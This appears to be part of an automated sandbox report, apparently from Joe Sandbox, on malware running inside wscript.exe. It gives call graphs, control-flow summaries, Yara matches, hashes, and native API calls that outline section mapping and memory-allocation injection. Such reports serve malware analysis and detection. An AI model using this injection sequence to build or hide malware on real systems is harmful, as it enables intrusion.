107709->107714 107710 914a50 8 API calls 107712 90f759 107710->107712 107712->107709 107712->107710 107713 91bdc0 2 API calls 107712->107713 107725 90f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 107712->107725 107713->107712 107715 91af60 LdrLoadDll 107714->107715 107716 91a6ff CreateProcessInternalW 107715->107716 107716->107702 107717->107705 107719 90829f 107718->107719 107720 9081b5 107718->107720 
107719->107712 107720->107719 107721 914a50 8 API calls 107720->107721 107723 908222 107721->107723 107722 908249 107722->107712 107723->107722 107724 91bdc0 2 API calls 107723->107724 107724->107722 107725->107712 107727 914e50 LdrLoadDll 107726->107727 107728 90f6ef 107727->107728 107729 90f6f6 SetErrorMode 107728->107729 107730 90f6fd 107728->107730 107729->107730 107730->107656 107733 9143c6 107731->107733 107744 90f4a0 107731->107744 107733->107658 107735 91bd40 2 API calls 107734->107735 107736 908ad5 107735->107736 107737 908cea 107736->107737 107764 919880 107736->107764 107737->107661 107740 90f683 107739->107740 107812 919e90 107740->107812 107743->107664 107745 90f4bd 107744->107745 107751 919fc0 107745->107751 107748 90f505 107748->107733 107752 919fd6 107751->107752 107753 91af60 LdrLoadDll 107752->107753 107754 919fdc 107753->107754 107762 4da2f30 LdrInitializeThunk 107754->107762 107755 90f4fe 107755->107748 107757 91a010 107755->107757 107758 91af60 LdrLoadDll 107757->107758 107759 91a02c 107758->107759 107763 4da2d10 LdrInitializeThunk 107759->107763 107760 90f52e 107760->107733 107762->107755 107763->107760 107765 91bf90 2 API calls 107764->107765 107766 919897 107765->107766 107785 909310 107766->107785 107768 9198b2 107769 9198d9 107768->107769 107771 9198f0 107768->107771 107770 91bdc0 2 API calls 107769->107770 107772 9198e6 107770->107772 107773 91bd40 2 API calls 107771->107773 107772->107737 107774 91992a 107773->107774 107775 91bd40 2 API calls 107774->107775 107776 919943 107775->107776 107782 919be4 107776->107782 107791 91bd80 LdrLoadDll 107776->107791 107778 919bc9 107779 919bd0 107778->107779 107778->107782 107780 91bdc0 2 API calls 107779->107780 107781 919bda 107780->107781 107781->107737 107783 91bdc0 2 API calls 107782->107783 107784 919c39 107783->107784 107784->107737 107786 909335 107785->107786 107787 90acf0 LdrLoadDll 107786->107787 107788 909368 107787->107788 107790 90938d 107788->107790 107792 90cf20 107788->107792 
107790->107768 107791->107778 107793 90cf4c 107792->107793 107794 91a1e0 LdrLoadDll 107793->107794 107795 90cf65 107794->107795 107796 90cf6c 107795->107796 107803 91a220 107795->107803 107796->107790 107800 90cfa7 107801 91a490 2 API calls 107800->107801 107802 90cfca 107801->107802 107802->107790 107804 91af60 LdrLoadDll 107803->107804 107805 91a23c 107804->107805 107811 4da2ca0 LdrInitializeThunk 107805->107811 107806 90cf8f 107806->107796 107808 91a810 107806->107808 107809 91af60 LdrLoadDll 107808->107809 107810 91a82f 107809->107810 107810->107800 107811->107806 107813 91af60 LdrLoadDll 107812->107813 107814 919eac 107813->107814 107817 4da2dd0 LdrInitializeThunk 107814->107817 107815 90f6ae 107815->107664 107817->107815

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction ID: 30d77a8122b9a0be4c15d2064dd31e72a998f64ceaeffbc863e0098e3f8e25da
                                            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction Fuzzy Hash: 0DF10074518A8C8FDBA5EF68C894AEEB7E0FF98304F40462AD44BD7254DF34A545CB41

                                            Control-flow Graph

                                            control_flow_graph 209 4ad9baf-4ad9bfe call 4ad9102 212 4ad9c0c-4ad9c9a call 4adb942 * 2 NtCreateSection 209->212 213 4ad9c00 209->213 219 4ad9d5a-4ad9d68 212->219 220 4ad9ca0-4ad9d0a call 4adb942 NtMapViewOfSection 212->220 215 4ad9c02-4ad9c0a 213->215 215->212 215->215 223 4ad9d0c-4ad9d4c 220->223 224 4ad9d52 220->224 226 4ad9d4e-4ad9d4f 223->226 227 4ad9d69-4ad9d6b 223->227 224->219 226->224 228 4ad9d6d-4ad9d72 227->228 229 4ad9d88-4ad9ddc call 4adcd62 NtClose 227->229 230 4ad9d74-4ad9d86 call 4ad9172 228->230 230->229
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: Section$CloseCreateView
                                            • String ID: @$@
                                            • API String ID: 1133238012-149943524
                                            • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction ID: 3fb0b5f69dc53756ad27d96c275fa6c0ba0fb3f142f5bf1eccd04eb73c32b140
                                            • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction Fuzzy Hash: 79617270518B488FDB58EF68D8856AABBE0FF98314F50062EE58BC3651DF35E441CB86

                                            Control-flow Graph

                                            control_flow_graph 268 4ad9bb2-4ad9bef 269 4ad9bf7-4ad9bfe 268->269 270 4ad9bf2 call 4ad9102 268->270 271 4ad9c0c-4ad9c9a call 4adb942 * 2 NtCreateSection 269->271 272 4ad9c00 269->272 270->269 278 4ad9d5a-4ad9d68 271->278 279 4ad9ca0-4ad9d0a call 4adb942 NtMapViewOfSection 271->279 274 4ad9c02-4ad9c0a 272->274 274->271 274->274 282 4ad9d0c-4ad9d4c 279->282 283 4ad9d52 279->283 285 4ad9d4e-4ad9d4f 282->285 286 4ad9d69-4ad9d6b 282->286 283->278 285->283 287 4ad9d6d-4ad9d72 286->287 288 4ad9d88-4ad9ddc call 4adcd62 NtClose 286->288 289 4ad9d74-4ad9d86 call 4ad9172 287->289 289->288
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: Section$CreateView
                                            • String ID: @$@
                                            • API String ID: 1585966358-149943524
                                            • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction ID: 3e424f4e873533c0e93bbe9b76578c80174db02b195eee603551ed9a0a4bd61c
                                            • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction Fuzzy Hash: 8E517FB0618B088FD758DF58D8956AABBE4FB88314F50062EE58EC3691DF35E441CB86

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520123869.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4ad0000_wscript.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction ID: dadb893f9530c6aa98e58827c6456c56b877b38b98650f81d1ebdf38d2b16dc4
                                            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction Fuzzy Hash: 8B512D70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7250DF309645CB41

                                            Control-flow Graph

                                            control_flow_graph 548 91a35a-91a35d 549 91a38c-91a3b1 NtCreateFile 548->549 550 91a35f 548->550 552 91a3b6-91a3bb 549->552 551 91a361-91a389 call 91af60 550->551 550->552 551->549
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00914BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00914BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0091A3AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 49fad434f0a1f55386e671611d7ec720c9013ca55772fad69b50bb1605ab51ed
                                            • Instruction ID: b66a71982161ea1e085a9e1341e22d96248f45f77fc2dfb09534257ebf8e008f
                                            • Opcode Fuzzy Hash: 49fad434f0a1f55386e671611d7ec720c9013ca55772fad69b50bb1605ab51ed
                                            • Instruction Fuzzy Hash: 7501D6B6201108AFCB04DF88CC91EEB33A9AF8C754F158208FA1897241DA30EC418BA0

                                            Control-flow Graph

                                            control_flow_graph 556 91a360-91a376 557 91a37c-91a3b1 NtCreateFile 556->557 558 91a377 call 91af60 556->558 560 91a3b6-91a3bb 557->560 558->557
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00914BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00914BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0091A3AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: ad5a85eb2a2bae17b90a3b862c8fac09414ebda6f18ac195f42305a71bd9fcb9
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: A7F0BDB2201208AFCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            APIs
                                            • NtReadFile.NTDLL(00914D72,5EB65239,FFFFFFFF,00914A31,?,?,00914D72,?,00914A31,FFFFFFFF,5EB65239,00914D72,?,00000000), ref: 0091A455
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 818777a63a75c95fae6c85831726c7ff98adb195d8c0574ffa75a5f39797a94b
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: A6F0A4B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BA1D97241D630E8518BA0
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00902D11,00002000,00003000,00000004), ref: 0091A579
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b440f8bb9d8363535c7513422f90b0563e122b49a6642ac6239811c06e011424
                                            • Instruction ID: c6c479625b4f0b288c2fc8b74116bf14ab6a3b6b6a3a4e527410df240d18a316
                                            • Opcode Fuzzy Hash: b440f8bb9d8363535c7513422f90b0563e122b49a6642ac6239811c06e011424
                                            • Instruction Fuzzy Hash: 8CF0F8B2200218AFDB14DF88DC85EE777ADEF88754F158249FE0997241C630E811CBA0
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00902D11,00002000,00003000,00000004), ref: 0091A579
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 32e73026d83071328f3216130e5ca74bc52b97411d13c6ab2fc31f4d2a898c47
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: B4F015B2200208AFCB14DF89CC81EEB77ADEF88754F118148BE0897241C630F811CBA0
                                            APIs
                                            • NtClose.NTDLL(00914D50,?,?,00914D50,00000000,FFFFFFFF), ref: 0091A4B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 2e7e5cbb505dfa10c6df4f23e206c91d9ae52f55c17413313c3d226b120a1068
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: E3D012752002186BD710EB98CC45FD7776CEF44760F154455BA1C5B242C530F90086E0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fa0965fcdc668d7156c43af158704345a0affc55ed5bac59a578ef5b2c4ee7b1
                                            • Instruction ID: 57a8689cfde6579f07c3a95296a71336a2975fd1f4e13610207a033a73b97be5
                                            • Opcode Fuzzy Hash: fa0965fcdc668d7156c43af158704345a0affc55ed5bac59a578ef5b2c4ee7b1
                                            • Instruction Fuzzy Hash: 1490023120140442F2007598580868600198BE0305F55D011B5436665ECA65D9917571
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 51226eb29ce4232a705c9ae51a4cc8dc70d7ba390ea29a8d8c8292f2b2b47156
                                            • Instruction ID: 68640c823db5561f60b43d09bbf9276782c2efdc0b492169cb43b1bbbee27b01
                                            • Opcode Fuzzy Hash: 51226eb29ce4232a705c9ae51a4cc8dc70d7ba390ea29a8d8c8292f2b2b47156
                                            • Instruction Fuzzy Hash: 8490023120148842F2107158880478A00198BD0305F59C411B4836768D8A95D9917561
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8d0d2589460e5f17e958e6b45211a49daa2af9b3479cbe8baa43a8ff788430ac
                                            • Instruction ID: 9a8c5a97be5d95272240df605faf9972517c16cebf706cedc2dee46e7f3b80bd
                                            • Opcode Fuzzy Hash: 8d0d2589460e5f17e958e6b45211a49daa2af9b3479cbe8baa43a8ff788430ac
                                            • Instruction Fuzzy Hash: 3590023120140882F20071584804B8600198BE0305F55C016B0536764D8A15D9517961
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 63b2e3d2be9babe9c20e5a0ec495d2f194ba79139835f2c9c1f084c42d031e18
                                            • Instruction ID: 47a0ed4be8d40b69c5d978fcd2c377f40bf103d83c69986d765d81401499a85d
                                            • Opcode Fuzzy Hash: 63b2e3d2be9babe9c20e5a0ec495d2f194ba79139835f2c9c1f084c42d031e18
                                            • Instruction Fuzzy Hash: 45900221242441927645B1584804547401A9BE0245795C012B1826A60C8926E956EA61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d8a24fb4a080172de846e2c5d253a11a9f6ee74ae8f28fa260c5f2fba066f657
                                            • Instruction ID: f11c78f6cec5c06acb4757a49eb696143a8e357c3ab1e83f62f7ae1480000fc1
                                            • Opcode Fuzzy Hash: d8a24fb4a080172de846e2c5d253a11a9f6ee74ae8f28fa260c5f2fba066f657
                                            • Instruction Fuzzy Hash: A690023120140453F21171584904747001D8BD0245F95C412B0836668D9A56DA52B561
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f77b0702986b6df3dfa41c32dd15af9299acb6fad6913ea56a1ab51a4fd1917d
                                            • Instruction ID: 9183c6fc977752e081353bb0ff51176589d8d52d3f586e803dcb804e8db85510
                                            • Opcode Fuzzy Hash: f77b0702986b6df3dfa41c32dd15af9299acb6fad6913ea56a1ab51a4fd1917d
                                            • Instruction Fuzzy Hash: F590022921340042F2807158580864A00198BD1206F95D415B0427668CCD15D9696761
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 62be31fad21be0928957d8c1faef7a765a5bdaef2ad212dc447e18cd7a353779
                                            • Instruction ID: 9573b60dc5f2f0980167eacd4802740b39adc06727c55706b69c5513b4291c07
                                            • Opcode Fuzzy Hash: 62be31fad21be0928957d8c1faef7a765a5bdaef2ad212dc447e18cd7a353779
                                            • Instruction Fuzzy Hash: 0E90027120140442F2407158480478600198BD0305F55C011B5476664E8A59DED57AA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3e581adfab10ea6aef2e13155ebd61ffb2e59c6ccde02a6f8696b8360a605dc0
                                            • Instruction ID: 4d36324844a28efcfe4df9262898bff449184c1e481f7230cc2e8e6724eb5747
                                            • Opcode Fuzzy Hash: 3e581adfab10ea6aef2e13155ebd61ffb2e59c6ccde02a6f8696b8360a605dc0
                                            • Instruction Fuzzy Hash: 19900221211C0082F30075684C14B4700198BD0307F55C115B0566664CCD15D9616961
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1deca70078323baa47959c2ade2f72f0d93c37318429857c197ebac31bd84d58
                                            • Instruction ID: d428c1f54c55325e6498e4adb9f0e8671001bc823d5bee5531803295905d5333
                                            • Opcode Fuzzy Hash: 1deca70078323baa47959c2ade2f72f0d93c37318429857c197ebac31bd84d58
                                            • Instruction Fuzzy Hash: 7A90026134140482F20071584814B460019CBE1305F55C015F1476664D8A19DD527566
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3caece7f50f354e36744c3c702bbc523888ae52511a4858886d1e9151df0d936
                                            • Instruction ID: afee7e8394257c2cbfda82e001961554c3a746c78104857718caa282e0b1b41c
                                            • Opcode Fuzzy Hash: 3caece7f50f354e36744c3c702bbc523888ae52511a4858886d1e9151df0d936
                                            • Instruction Fuzzy Hash: 31900225211400432205B5580B04547005A8BD5355355C021F1427660CDA21D9616561
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d268b0a3db8901defa20994e000556a39692e95c7a900ae667e43cf553faae75
                                            • Instruction ID: 27a22512140e2ddaca55c56e85de96125d24dd4cfff9b7b29301ead579374c7e
                                            • Opcode Fuzzy Hash: d268b0a3db8901defa20994e000556a39692e95c7a900ae667e43cf553faae75
                                            • Instruction Fuzzy Hash: 9C90023120140842F2807158480468A00198BD1305F95C015B0437764DCE15DB597BE1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5c56d55dfa65b840535921be9e03c9d71bb94eff18ff980003119effe78c40f7
                                            • Instruction ID: f13604f54df5ece040f8e50785e1d66fda16189215528131955c5cb487b0fc7c
                                            • Opcode Fuzzy Hash: 5c56d55dfa65b840535921be9e03c9d71bb94eff18ff980003119effe78c40f7
                                            • Instruction Fuzzy Hash: E990023120544882F24071584804A8600298BD0309F55C011B04767A4D9A25DE55BAA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b8c17d1a487a073ad1cf48a87b6cd60f2272e29dfc9c2f6b4474023f379abb23
                                            • Instruction ID: d5b8d3517d76a3d4dc852672644fa3d3e4f24caa830cff659e14a9522b83dd8c
                                            • Opcode Fuzzy Hash: b8c17d1a487a073ad1cf48a87b6cd60f2272e29dfc9c2f6b4474023f379abb23
                                            • Instruction Fuzzy Hash: A890026120240043620571584814656401E8BE0205B55C021F14266A0DC925D9917565
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
